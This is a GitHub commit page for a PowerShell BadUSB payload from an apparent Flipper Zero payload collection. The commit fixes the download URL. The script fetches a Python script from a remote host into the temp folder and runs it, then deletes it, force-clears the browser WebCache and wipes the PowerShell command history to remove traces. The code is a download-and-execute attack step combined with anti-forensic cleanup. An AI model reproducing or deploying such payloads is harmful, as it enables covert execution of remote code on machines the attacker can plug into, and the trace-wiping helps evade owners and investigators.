Skip to content

Commit

Permalink
Merge pull request #14 from tomgxz/patch-1
Browse files Browse the repository at this point in the history
Fixed permanent script link problem
  • Loading branch information
aleff-github committed Jul 29, 2024
2 parents e862b16 + e38e4fd commit 1307fa9
Showing 1 changed file with 2 additions and 2 deletions.
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
# Download Python script
$scriptUrl = "https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/CloseAllApplications_Windows/script.py"
$scriptUrl = "https://raw.githubusercontent.com/aleff-github/my-flipper-shits/main/Windows/Execution/CloseAllApplications_Windows/script.py"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)

Expand All @@ -13,4 +13,4 @@ Remove-Item $savePath
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force

# Clear the PowerShell command history
Clear-History
Clear-History

0 comments on commit 1307fa9

Please sign in to comment.